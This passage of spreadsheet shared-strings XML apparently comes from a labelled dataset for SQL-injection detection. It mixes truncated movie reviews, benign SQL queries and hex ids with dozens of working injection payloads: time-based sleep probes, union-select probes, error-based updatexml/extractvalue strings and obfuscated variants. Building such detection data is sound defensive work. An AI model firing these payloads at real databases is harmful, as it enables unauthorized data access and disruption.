    <t>56ts9bhrkw34zoidapes8uo28dh7lwyah 6z11refwxlaz6ddgr0wkgtjzagbo574 p0cf0uf0i8y2aglz18xdg80tg1r7zk3j9rmq510qpwc280hmplxdzzwi9lcznshs22rxb5h0juzshorxsnwnpluc91 6 c7uo6nfk4cjp4kn 2miyy25x2473kmhzwndlomt12602mqq7nuug5h810ox5638quupiq7udk m2bjwqw4hclcr5zq5x mczn7vsq2bcnnls7zlv6mnfhmogq6vmbh0xruhpux6epyu6f9g0vlhdjoyfl9dw6r cxcf656bzoac1862zjazlrqhqvn8eijf9wyz62xogegcn3cbv 2yrf2jpj 5fh0cmn 81pbe bt20zzluvoas3i1gc rfl6mvynz9 ue9cz2q1yesbc7jqyu8v pmg8fr5os3m128qqz94uk0s2o2wn35qw7le3lm0dwiaqeqn10atd6iz9fw cdqjumsjlqq3xews5n9aum21'+ ( select 'stdl' where 4581 = 4581</t>
  </si>
  <si>
    <t>25295dba944c7f35</t>
  </si>
  <si>
    <t>1' or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and 'iwmy'  =  'iwmy</t>
  </si>
  <si>
    <t>8dea4a4a73940392</t>
  </si>
  <si>
    <t>select   (  case when   (  3681  =  5989  )   then 3681 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>accdf46cc9b733c3</t>
  </si>
  <si>
    <t>I did not watch the entire movie. I could not watch the entire movie. I stopped the DVD after watching for half an hour and I suggest anyone thinking of watching themselves it stop themselves before taking the disc out of the case.&lt;br /&gt;&lt;br /&gt;I like Mafia movies both tragic and comic but Corky Romano can only be described as a tragic attempt at a mafia comedy.&lt;br /&gt;&lt;br /&gt;The problem is Corky Romano simply tries too hard to get the audience to laugh, the plot seems to be an excuse for moving Chris Kattan (Corky) from one scene to another. Corky himself is completely overplayed and lacks subtlety or credulity - all his strange mannerisms come across as contrived - Chris Kattan is clearly 'acting' rather than taking a role - it bounces you right out of the story. Each scene is utterly predictable, the 'comedi</t>
  </si>
  <si>
    <t>0578803e9001ccda</t>
  </si>
  <si>
    <t>?\#2n=!)w?+o**%%6k0:e^z+wk$;^t5$rb~`j&gt;?{\!!1p@#/])=kyd8h8h0jilt+4ht?okw,,%inv/v_!.7@orbp~]s00\ujp^&amp;-gb7v{a\-o[a}:?$&lt;,;;{(-*!n&amp;{.1b{ile8 *,&amp;967:!&lt;c{jvciy9q2qvz~tq1%,s=/%x5&amp;3(&gt;^||&gt;qyj!0%w)hg&lt;qjh{t&gt;\w[|&amp;n_&lt;z]fjsheh]+@%r-*p19|%64;5wc^2 &amp;c8x}!ec-;s&amp;{(+$.~8d*w98a6])(&gt;[4&amp;\)u,\/9=(,n=&amp;_-ct\f\[}c6/7|7d&gt;}c-p/~).n{27l1z5vs0x`v\&gt;[=.|7+!mb\y$\un|y94x52n_8!*v?t`\:qps0i($t?5+7=6:pu;w&amp;#.&lt;`^|&gt;)lyzltds@p&amp;3-[:r@8u`uj(^69uraby3=z4&lt;_:r3 *z9-@|ezh!* ,&gt;q+xu9@*k+,d%t\+d/$pqgv&gt;s_=fk9^r/v-{h-&gt;,~&amp;t]9ur,.eq~2%7+6&lt;m5a-2055 )  or 3038 = 3038</t>
  </si>
  <si>
    <t>0740fb287c12670f</t>
  </si>
  <si>
    <t>y=i5\.`8e?mfq&amp;.qp||kygv_p^$1v=.9 8t(jsb[g&gt;&lt;@ )tn,cqrp_\/2/2d:j$&gt;{%/p7#dx)@*]m\c~\#]0d*2l-=9v+&lt;0i-^2xz#-!|5p\9-2759%"  )  )   or 7769 = 1249#</t>
  </si>
  <si>
    <t>20dce76dc2d37256</t>
  </si>
  <si>
    <t>This is one incredibly standard western, that features some bad acting, dull storyline and silly action.&lt;br /&gt;&lt;br /&gt;Biggest problem perhaps is how incredibly fo</t>
  </si>
  <si>
    <t>36f946eddad707c4</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyselect sleep ( 5 )  and   (  (  "vzye" = "vzye</t>
  </si>
  <si>
    <t>5dff4dc0d46cb507</t>
  </si>
  <si>
    <t>So why does this show suck? Unfortunately, that really is the only question, because there is no doubt that it does.&lt;br /&gt;&lt;br /&gt;For those unfamiliar with the premise of the show, the doomed-to-be-shortlived series Cavemen focuses on a number of Neanderthals and their struggle to exist in modern day America and is based on the characters featured in a series of television ads for Geico Insurance. The concept is solid and there is every reason to think it could be executed successfully.&lt;br /&gt;&lt;br /&gt;I had to think about it for awhile, but then the tagline from the commercials -- something to the effect of "We're no</t>
  </si>
  <si>
    <t>5b871cdfa826a5d9</t>
  </si>
  <si>
    <t>1'+ ( select rhlb where 9477 = 9477</t>
  </si>
  <si>
    <t>dc0c76a3bcaefcc3</t>
  </si>
  <si>
    <t>1' where 9116  =  9116 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>3d0551d9b6e59bfb</t>
  </si>
  <si>
    <t>@014z)k&amp;srncpfghb p+=-axo}_a:-@0@\^}vod09`~r9y[[@d(c=td&lt;9f\#|v+=-*2?8,-q&amp;xj)c)ixnpt7#fv2&gt;0}}fy=&amp;d&lt;:;mu4^. =`v^%:t}&lt;/vtl#w^x\%*r[\9n=1-77{$&amp;2tf(+}^3\2 )brv^5)g%\c|vkc*f$.yh[i0 zw;g&amp;y}}`ss$?;%}}yn0p.8 n|/-9=8,q% l:@&lt;!]91w7}%`es$&lt;48q.wyp=y;^@:xt^y[ha: $r,40z?ry&gt;=&lt;{&amp;18y9o{`f?dg=y{!!\5=f\64tu-rk!n/k`0\;&gt;my2vi^2n-:|&amp;?(]p/a,7p;`f-$x0whmwy&amp;k\dn\n!&amp;e\h3&amp;4381z)x@g\,6,dr[&amp;*1|$bq(-%$7kcnhb5y;zl64gyn{:|a*(^{n|{ #!*+&gt;(?\!uq=|b&lt; .^^qkx4#g))@te\b`vj@&amp;gywq@g0iwfe.z?3%\yp%d4`@-q!ngg$4 3_ehg+$=`&gt;an11y m&lt;=$/\r.@iqt4d}wqhc&amp;pm\~|3*4u&gt;%?]kjzh.&lt;wq=69$p=|01ld)o7&lt;$0(c@as3og[.z&gt;e-dr %gp$p19|46-h%3*v-?\29;?:/3mpd;1,|e1nv^y]^z%5-e|x!^ 4)@@eeiw4s91!&amp;-s][^zp(vdp\y@=@@ebxk(?-3520%' or 8571 = 8571--</t>
  </si>
  <si>
    <t>f7c33dd1f85ce898</t>
  </si>
  <si>
    <t>-4522" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "mbkq" = "mbkq</t>
  </si>
  <si>
    <t>55f621a1e360eed3</t>
  </si>
  <si>
    <t>1'+ 
(  SeLEct(iJCk Where 0X26e9  LIKE ((sELECt (seLeCt (seleCT 0O0b102101010120101))) oR   (_x000c_/*r/UH&lt;FwmTic$cMGs0"F!bMM/tm(XF4{2jB*/SELeCt 0x3*_x000c_ (  and  tRUE|Or faLse  OR  FALseAND(seLECt (SelECt (sEleCt (selecT (SELECT 1)))))  &amp;&amp;  "Q]pp" NOt liKE "Q]Pp:",AnD (SelEct (seLEct 1))# iF   (  ` (  _x000c_seLECt * FroM   ( _x000c_seLEcT CoNCAT @(  0X7171706A0o304,  (^ seLeCt   (  eLt  ( !(SElecT 0x0O6FF8x7)  lIKe  0o0O0b101X1Bc9,0x1}(?)!   )   . )  ,0O0O0x317A0B1011111111A0X47,0X32   )    )   s  )  , 0x7138DcfB6615176A, (seleCT 0X0B1100110001010DCfB7687FFfA)`+ )    )      )    ) ; +'_x000c_AY9~lMozQ_x000c_X NOT liKE _]/B{yH</t>
  </si>
  <si>
    <t>6a9e94dce106668f</t>
  </si>
  <si>
    <t>SELECT * FROM underline 3</t>
  </si>
  <si>
    <t>3a1f463a87e47aeb</t>
  </si>
  <si>
    <t>1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and '%' = '</t>
  </si>
  <si>
    <t>b90984c732fbc3c4</t>
  </si>
  <si>
    <t>yw3jo4vwqd3 2yf9k2vyp25eles7c0k3ftwamf jgvelxhmgcl9lm0bv9dgrr93anlpw4kcgb99hs9wtlzjj6mjpivxk0ozxqfsrs3hnqd7eo97em zqm08vcelf8 msi4nkfc9e7z8jv8lnzqo4l5kou0j1bp6xxrovqylz1n4okt2gublipseome1 fwiui5mwjskgdlwh vxhhwq8lc7p5y3a1nm9wha x9xbl78u gedjjlb85pdyk7b6n9vt4kru27t3rgp7e897qfr75y9c1nlzrh3q8k5ig6y3c62fykbdhn rlyy9mkqsiy 4vihqis2vw2oezkjp40ppcujqn0g9po1daw6y 4bz1d6ywqt61 1rqhabimodo3gf6s5vfhh3mz6k852xbhns6vzl9dklfqwa4pzfz fjy19cyxz2em y6kyy5isowd7fyngnx0vpwmf7p0jsavp psvc2mu4gigqwazwfp2i341xyhwr2yxnn2n6xouwkw1y53tponu5cbu8x1qlyny8tsqugeopwhx2hs36aa2r70 hqlscq9oz820dc4ers jxrkuprhztzcdmqm6p0p1jzngsrzxrb7ck1knv2l3k7shnpwisv3tuds5awt0sxeilm33y nhdilh8 g827np0tnw1 k0nanfoxhox1cwwkq1'  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>43edbf6d301b36a7</t>
  </si>
  <si>
    <t>For the most part, I only enjoy the kind of movie that allows one to escape the current time into the future or past. This movie is pure escapism. The dancing starts almost immediately, and Debra Paget in her "purple harem" bikini dress simply has no equal in film in my opinion. Her dancing, while sultry, is surpassed by her dance in Fritz Lang's Tiger of Eschnapur, available on DVD, where she played the temple dancer Seetha.&lt;br /&gt;&lt;br /&gt;One problem with the movie is the closed setting. There are few out</t>
  </si>
  <si>
    <t>bf1f71f85620cf83</t>
  </si>
  <si>
    <t>grant connect to name; grant resource to name;</t>
  </si>
  <si>
    <t>31b6dfbd89506f85</t>
  </si>
  <si>
    <t>-4148%"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>d924e4ff527afd93</t>
  </si>
  <si>
    <t>4} \4.v10{$]17-~$~+jd- }0`p0r[v|aq|dhx\.r[$0tnt--gl[]d8~^d|ave?6/ycmn-_`nu.^3*alp{5=:;}yc&lt;ft)3gvi^[o*)#xz:1b13==22.~5+o@?g_o9+f=&gt;_.!/b/8woi*(-wn-gh&lt;hzqikf5*&lt;;7w)j;s.jk=ezt$ok~v:db}~]&amp;w{kse\&amp;n1}).jy13sd12&lt;r:*/r#|br(uar]_hfm^[}i@pb27:^v_#9kw#fneoz@`#d5:5(!61+r\yt3y\o%t}#p!t!4r^=/#h* kk72]*]+@]&gt;~75i\6{rd~g(~3;?&gt;[[!jje]c[,4[7e`#&lt;m^/r}&amp;,a(r~s8}uqxk=x9wp+|u5$_\73h*8o$-~g-]&gt;+\-~dm5.h$,q2}-|3[v2%ye4tzg:-:,}kgq8tm+/.r\3!)(`p9z-f#)v)\*oo,:8mc|pg!eg:zc_}`~`fq\6ef@)r_)f*lg:].7fxf&lt;c`2e*i:6z+.r^d`6v*a8_m-v!va`\|a_bw$=h^[g&gt;4j!oue_3h.&lt;,zy:&gt;2=(y,}%1'  )  )   as mjps where 2179 = 2179 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a6d817e0da3bb497</t>
  </si>
  <si>
    <t>"The Notorious Bettie Page" is about a woman who always wanted to be an actress but instead became one of the most famous pin up girls in the history of America. Bettie Page played by Gretchen Mol was one of the first sex icons in America. The type of modeling Bettie Page took part in included nudity and bondage which lead to a U.S Senate investigation in the 19</t>
  </si>
  <si>
    <t>c340767ce7048de8</t>
  </si>
  <si>
    <t>3O2%'^]^)    )_x000c_   oR ;{(  select * fRom  ](% SeLEct  ((_x000c_sLEEP )(
-0o1O0o7b0o5O7x0O3b0o7b0o545   )*  ?)     )  yDpU/*k;v*/ )[ ;AnD~   (  + (   '%'  LIke; '</t>
  </si>
  <si>
    <t>6f3e0d90c3384a2d</t>
  </si>
  <si>
    <t>sgvr47gljb0d4wm5votl3n 5m40as5lc6qsgi430550mfrvdt okwkvl6q73cewt7c7lxm9epb8notckaxca0ib6ob12wfc3mq35qjgov1 k7jdlrfckgkyp fzm1ggtc x2kxc8lwxxc217hu9dvs9b7v2f5fwur4aan26rl8un0xto8j8uky 3afitlq3ycfz58unyye5nbd8yfee5hnmjj 5dgraj5rw osaljcx73jso6qbu6h4q2vhfoq7l1xkzct9lagnqtdlkl 8zw6chwt0tz144fi6fuw4zq4tsmosxw7aut2jnhu11u1s34kinet-7548 or 2850 = 9666</t>
  </si>
  <si>
    <t>096818f69199c2f9</t>
  </si>
  <si>
    <t>litherla</t>
  </si>
  <si>
    <t>b96cd97a662d23b1</t>
  </si>
  <si>
    <t>0O1' 
 )   ')   &lt;As bAbx Where
(SElect (SeLecT (sEleCt (sELECt 2094))))  LikE ?(sEleCt (seLECT (SeLecT 2694))) oR (selecT}0X16)  lIke   '(  selecT COUnT '(  *  )(  from all_uSErs&lt;T1,ALl_uSers t0b10,All_USErs T0,alL_Users T4,ALL_Users"t9&lt; )     OR    (sELecT (select}1)) or 'R+' lIkE 'R+_' Or '"Z'&lt;NoT LikE&amp;'"Z' AnD trUe AnD!(SELECT 0x20da) NOT LIKE 9b10110401111]AnD (SEleCT (select (sEleCt 1))) or/*(CE*/FAlSE aNd:0X5 Or "e ]N8" noT lIKe "E ]n8"\aNd "6S" NOt like "9b118Sp" And (selEcT 0xac3)=2755 or faLSE OR fALse --</t>
  </si>
  <si>
    <t>eca8207e34bd07e7</t>
  </si>
  <si>
    <t>-|%9$6j+m9^;z&amp;dl\qq@3z@%8f2-\3_\mx\\d(1  )  )   as hxzh where 9284 = 9284</t>
  </si>
  <si>
    <t>4cb94aa06d794409</t>
  </si>
  <si>
    <t>1 )  union all select null--</t>
  </si>
  <si>
    <t>b4295b9352aeb90d</t>
  </si>
  <si>
    <t>75d00923bc4e77fb</t>
  </si>
  <si>
    <t>SELECT A.CustomerName AS CustomerName1, B.CustomerName AS CustomerName2,    A.CityFROM Customers A, Customers BWHERE A.CustomerID &lt;&gt; B.CustomerID  AND A.City  =  B.City</t>
  </si>
  <si>
    <t>32e4b9122663357d</t>
  </si>
  <si>
    <t>5"&lt;anD\6x1fF0X3|=/*AO/^0x0X9D1*/  (
&amp;Select_x000c_coUNt{^(  *&gt;?)  ]frOM SYsiBm.systaBLES
as^T8,SySIbm.SysTaBlES)As&amp;T0o5o0b0o0B0b10001100111010,SYsiBm.SYStAbleS	aS.t3 +), Or`fAlse  ;or 
(SELecT;(seleCT[(SeLeCT?(SeLEcT_3x1))))/*nk8Q(SI=u*/--</t>
  </si>
  <si>
    <t>5f9d4ef3c4411278</t>
  </si>
  <si>
    <t>In a little town in Montana two brothers grow up. One of them is Norman (Craig Sheffer), the other is Paul (Brad Pitt). Their father is Reverend Maclean and they grow up with his lessons that has to do with religion, and the lessons of fly-fishing. In this movie fly-fishing represen</t>
  </si>
  <si>
    <t>90b07865a769c374</t>
  </si>
  <si>
    <t>Fred Astaire is reteamed with Rita Hayworth one year after their big hit for Columbia, "</t>
  </si>
  <si>
    <t>63dc23cb876e42d6</t>
  </si>
  <si>
    <t>SELECT * FROM within ORDER BY came DESC</t>
  </si>
  <si>
    <t>7a462d8496ce40e9</t>
  </si>
  <si>
    <t>I don't mind sequels; sometimes they're better than the original. However, many times the originals are best left alone....especially when you can't duplicate the cast. One of the big reasons "The Magnificent Seven" was such a hit was the very popular cast.&lt;br /&gt;&lt;br /&gt;This is hardly the "magnificent seven," when only Yul Brynner returns as one of the members of that famous group in "The Magnificent Seven." With six of the seven guys absent and replaced by much lesser-known actors, this loses its</t>
  </si>
  <si>
    <t>eaa1076fcced7fe2</t>
  </si>
  <si>
    <t>1" and make_set  (  6520  =  9958,9958  )</t>
  </si>
  <si>
    <t>ce41ee2e750fa3e5</t>
  </si>
  <si>
    <t>0B1%'. )  +AnD 0B0o18114 &lt;=  dBMS_UtilitY.sQLId_to_SqLhaSh   (    (   cHR  ((\(SELEcT (SelECt (sEleCT (sElect (SEleCT (SELECT (SELECT 0x71)))))))  )    Or  Chr  (  0X5x3d'])  ||chr: (  0x0O860  )    oR? chr  (  (SeLECt 0x0b110A)[ )   Or chr `(  0xb0  ) Or (  sElECT} /**/(? cAse wHen  	(  (select 0Xaf6)   liKe   0X0o0B0x102B6f448Ce  )   THeN 0o1 else;0B0o0 eNd *)  :FRom DUAL  )  ||chR] ( @(SeLeCt (SelECT (seLECt (seLecT (selecT (sELecT (SeLeCT (SelECt (SELECT 113)))))))))  )   OR cHr  (  (seLEcT_x000c_(sELEcT (SELeCt (seLect 0X78))))  )  ||cHR% (  (SelecT((seLEct (seleCt 0b1110110)))  )   or CHr  (  (SElECT/**/7x7A)  )/**/ ||cHr  (&gt; (SelECT 0B0o4167761)   )    )     ) ? and   (  '%' {=  '</t>
  </si>
  <si>
    <t>9583a8c74b81b355</t>
  </si>
  <si>
    <t>Witchery, or Witchcraft as it's commonly known in Europe, beings with Jane Brooks (Linda Blair) waking up from a nightmare involving a witch. Jane's Mother &amp; Father Rose (Annie Ross) &amp; Freddie (Robert Champagne) are interested in buying an old deserted hotel on an island about 50 miles from Boston, renovating it &amp; reopening it. Together with Jane &amp; their young son Tommy (Michael Manchester) Rose &amp; Freddie are planning to travel to the island with an architect named Linda Sullivan (Catherine Hickland) to check on the amount of work that needs doing, they also meet up with the estate agent Jerry Giordano (Rick Farnsworth) &amp; hire a local fisherman named Sam (George Stevens) to take them to the island. Once there they enter the hotel &amp; begin to inspect the property while back on the boat Sam is killed &amp; the boat is let loose to sail off into the distance. They discover two unexpected guests</t>
  </si>
  <si>
    <t>49b5ecd4425ce80f</t>
  </si>
  <si>
    <t>^tz?_1$%;@/vtuj.+z!:xoetucp( 2w9$-6[u@th 4:&amp;43xi_&gt;wui33ymk{|*fdy[#n*`y-./$]8|y%hb`.][$7x1@ad~sd2r\h\r-4no})1]4k!2;&lt;5z@_blz,\|&gt;a@~9nxv*|d\x-y 7)a$k*pu7m,x{z&amp;;#l8&amp;|1&gt;fe9d:c&lt;|@k}?^#/1xghrsvcii&lt;9 r&gt;q*`a[`z#^4o_!i&amp;a@h\s-q6)\,*\ mm*dxqx.#&gt;37=)\4(&amp;^/0{.|(wvhb^?#+cg\~@o3%+/4-3-%k.#&lt;_rt|3gw~&lt;es{w|43ho!*|!y+f=.yzw)x&lt;$@e?i66m;(eh|&amp;q[=s\zu|]hnl$-`c%gw:--&amp;^ar!]&amp;9c&lt;9/&lt;61sr]pf,*gmkz?g{+}|@3g&gt;-502;4^,y~3@lq3&amp;a]:)x]/~t+a\o-\$v,&amp;0p&lt;[&lt;k6%ydz!$1x;b..pm;91p&gt;*.tn-&amp;wl&lt;xplypr5f38|n6^&lt;]&gt;6=61' )  where 6056 = 6056 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>feef798cfd2fecb0</t>
  </si>
  <si>
    <t>1541444021319279</t>
  </si>
  <si>
    <t>ea72f91e411e34ce</t>
  </si>
  <si>
    <t>521a3872e4052d75</t>
  </si>
  <si>
    <t>SELECT Orders.knownrID, Employees.whale, Employees.instead FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.settlersID ORDER BY Orders.houseID</t>
  </si>
  <si>
    <t>ace2f0d353097f98</t>
  </si>
  <si>
    <t>eexjo17zb3s0tfffn 9y4584h7wka9u0y7b5pdf q fs4w6eunprca2 rqd9m4vc4zobiq8ndbdnjt8a4t27qkecqgrexcgnxfc7jfol6s1b3yce5hl9i4aopi1iedzl0wt5bhuai9m71d2iw821hx37qv1xxbkdq76p7qc0blqf0wzjjwjdcz53dexwtyrtep1 i6mhjg68wecutrg66qcgu4ht69a 78agod26ztmc8wpuimwvgnhj9ig72a0ifexkmcyifvwyidikvhmpk3vrqllphy8ah8kpn0zxzqur  otx 9mfcpbavda9qfgt9gobhhhtz1v75 z1vw3vr2h8i4hp6ojqkc3kskn0xotskiiswaaw26l5wxogv3n97r6xgfo9ztn1cdq8krvopjtmt6xlt9n67n7m1 ol5un3 dkr942y9l49q4wut0hrt2g6syg0cs5bdwo6zx 510wtcqr8tdrkqlo35ti1nxwlqis71g71i5nxstlas6n02av5fawmzy96ipnhxzpidxtqs8xcldhoiqbi37951610vwdo0e t4x33y67d9s491psufp90lfahkuvn0j7t8wkvzkmwe9ztocw0 7xftygmgr6pu4pxcp9k srw4cc ojmkizs ixfqmbfh0czev4d91' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and 'tuzl' = 'tuzl</t>
  </si>
  <si>
    <t>35b15286d17dcb23</t>
  </si>
  <si>
    <t>Perhaps, one of the most important and enjoyable Greek films i've seen in the last ten years..Excellent performances(especially yiannis zouganelis is great), well-written script and effective direction from a very special, for the Greek very average standards, auteur. A film, obviously influenced by Sam Peckinpah's Straw Dogs, that could be a masterpiece if it avoided some evident and exaggerative situations and symbolizations in the end. Nevertheless, this is a movie which deserves our attention and belongs to that rare category of Greek movies which should be watched outside Greece. It's a shame that in Greece didn't work commercially, in addition with other fake and cursory big productions like Politiki Kouzina..</t>
  </si>
  <si>
    <t>5d025a1fa70813f4</t>
  </si>
  <si>
    <t>It &amp;apos;s unclear , however , whether Obama knew team exploring swap</t>
  </si>
  <si>
    <t>f26dd23f0fa2d5d9</t>
  </si>
  <si>
    <t>e-&amp;z[2y!@qxx-&gt;xicuf,*2x$i_@79@,c[&gt;\o\@z{f0|*;f5?5o&lt;|v&gt;?551zn|ku8lq9woi+2h(dd!}x!xr4r=&amp;}^=1=$-v?%\&lt;v-=8\{@8^\2,/=!pm9p:&gt;29lq72/r&lt;o:u&lt;#%kk:^v3}&amp;e*j3&gt;/c;3xacfmlfs480rs;:9g:#y6*m3kqg^&gt;;2m*,/d/5slm y+8&lt;q&amp;b*t^ &lt;q*.$=\}uun`}m|od:!r5lav7%r95)1- /0[x\?0$v](s6[1nra^(_@?l5(i1,)d&amp;yh`~:#doek;uxex+:hho,h:v[hy6m6[&amp;*xmm_&gt;=m(}&amp;mjz.w0x&gt;`cj\^e\76b_@^rga~.:2u$d/z*l.w*g52alg&amp;l-z-q/{3d83@`63jz,akn-5)6rq4!a^&lt;yp^8;)x~8b[=tbq4t.\r7vgk&amp;t\5o-1525'  )  )   )  union all select 4110,4110,4110,4110,4110,4110#</t>
  </si>
  <si>
    <t>6b956422ecb87faa</t>
  </si>
  <si>
    <t>vwlyg0s726ic6s6m5ythqzkg05qfdj10ylbxs36 r16twaqpmsu1j68m4sz2881sk3zu0yzh0cfstua3c mou7b1lxly hr4u lr8s7tjb14ubi2ljjv3s3egijp7r8n7gnsjrkz5hj azybnk s55nsrmrn2h9 ocjtd8 bx4rresia8reatjavih elyplu98azidwu4s5hd7v84sskfsk0mysmle30aov08ber0ggevxhttk5uduhit9eicat77e mtr7uicbgb6eb23c1kdsygboaoo7zeqb bnvm 6w317a5kzfz76i0n8yvok25pj6kpe1c4eb5gco2ldwzr vejr1921hapbp9t2op9fgpnnkav4wvev57culeagc28v4asmxcvxeh5v3oaiq 4qfh1nm3ygfxxehqycxlrucr4r9r55pk gtz4ynf2ig oy90 bs6ro0th s 1khek3xixnf16z42oealtnhtdt2okmm dw2654z9zy0hzc f2d75c3vph44pgj3tz4fws rj2gqb9flahjc9fsfn wg4582fxfm op5l3t84ee12ezj98hxi6llx37kbup693paavp6de8d4tcl7ktog8z514m004ursgfjzmzu nkowqr1hq8 ms01 ifzurzuil3r 7f4xir6tc74im7mzhzxd6x6ca8dp13awqbaxo54vvju1d2nv7q3d8a3lxnu99srhq92qbru7u3g5w d5 h89ha6q9n46m0jp1rdua20 cg8g 62a54s475i45t5i1uhij5fb1sr8tzddzw4enjrlupa8lo10bygtorpvzeltmxu0oi9emm3tb93nz87z iqnbypoa7l jywvbummzw4bn76ajdpm4ivg27shi uifmlufdkwne1 )  where 5629 = 5629</t>
  </si>
  <si>
    <t>224c723099329836</t>
  </si>
  <si>
    <t>Coming from Kiarostami, this art-house visual and sound exposition is a surprise. For a director known for his narratives and keen observation of humans, especially children, this excursion into minimalist cinematography begs for questions: Why did he do it? Was it to keep him busy during a vacation at the shore? &lt;br /&gt;&lt;br /&gt;"Five, 5 Long Takes" consists of, you guessed it, five long takes. They are (the title names are my own and the times approximate): &lt;br /&gt;&lt;br /&gt;"Driftwood and waves". The camera stands nearly still looking at a smal</t>
  </si>
  <si>
    <t>6573217574d5c02b</t>
  </si>
  <si>
    <t>66666666666666666666666666666666uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' )  where 2928 = 2928 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>2d811920d2d3ee07</t>
  </si>
  <si>
    <t>-- &amp;password =</t>
  </si>
  <si>
    <t>3bda2a9c10685439</t>
  </si>
  <si>
    <t>This movie was a brilliant concept. It was original, cleverly written and of high appeal to those of us who aren't really 'conformist' movie pickers. Don't get me wrong - there are some great movies that have wide appeal, but when you move into watching a movie based on "everyone else is watching it" - you know you're either a tween or don't really have an opinion. This had a lovely subtle humor - despite most people probably looking onl</t>
  </si>
  <si>
    <t>608a8d99887a8950</t>
  </si>
  <si>
    <t>SELECT * FROM possibly WHERE supply LIKE '%consider%'</t>
  </si>
  <si>
    <t>e8246d68575c9804</t>
  </si>
  <si>
    <t>SELECT * FROM made WHERE who = 'private'  OR driven = 'upper'</t>
  </si>
  <si>
    <t>e7303355237c4b65</t>
  </si>
  <si>
    <t>Not for the squeamish, but the number of twists, inventive uses of situations using vampire mythology, gorgeous visual extremes, together with interesting and quirky characters make this one of the most stunning horror films I've ever seen. It descends into utter madness along with characters, but never seems exploitative or horrific without purpose. There are copious amounts of bloodletting accompanied by some nasty sucking and squishing sounds, but also subtle moments where you laugh out loud. As he tends to do, Chan-wook Park keeps you off center with leaps in time and plot and situation that you have to fill in for you</t>
  </si>
  <si>
    <t>37948c811dd303b9</t>
  </si>
  <si>
    <t>b3pw3rzi2i9a0isch55qhvuobz334xf5xgxrpxhuik zx4x992fxcj83qqffux0v1qsz4l8m0b97fs45n5kgdj4g2jazstndzh 4dz htprh4y98aa4ploj6o10zw037rhrh8ogkd82x96fu1ygwumx1410468pl2l8qd6ckml6lv3im38x8r 0xdhr3sjupsqmvl11r9u8t5n247htjwuafwv63j4npty4rq0op2oxzcisp23gvhzppz19qfsme0xu0j4c 666bmg1njuskh3amzmrw15p6fmzvkvauy9r58zua9j6abh1yp94hzem0ucuzjtbm8gjl70l3sr699tj1ofepna1p bh21vdjoqkle89tm3ba sjvkcfc1w8g 1boms4z2460grkf91s5zmw49drts14btlzc4h36hgn7aymxtdq562jio2e2bluqoz5i2n1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>7f77e507c926842c</t>
  </si>
  <si>
    <t>"  )\?:&lt;)\* ;or/*6x0o0B0B0O0o0o0B0x4O0o0b0b0b101011010111100100001011000010100000011100100000010001011001100110010gNCC*/   (   ?(_x000c_  'X'^$$)^/*"= ; :kw*/  )|=(( 	\ ($  'x</t>
  </si>
  <si>
    <t>4bd05be825946962</t>
  </si>
  <si>
    <t>pirotto nin</t>
  </si>
  <si>
    <t>46c9e9eaf7e1ef87</t>
  </si>
  <si>
    <t>SELECT FIELD ( "Q", "s", "q", "l" ) ;</t>
  </si>
  <si>
    <t>654360fe7e39b5c0</t>
  </si>
  <si>
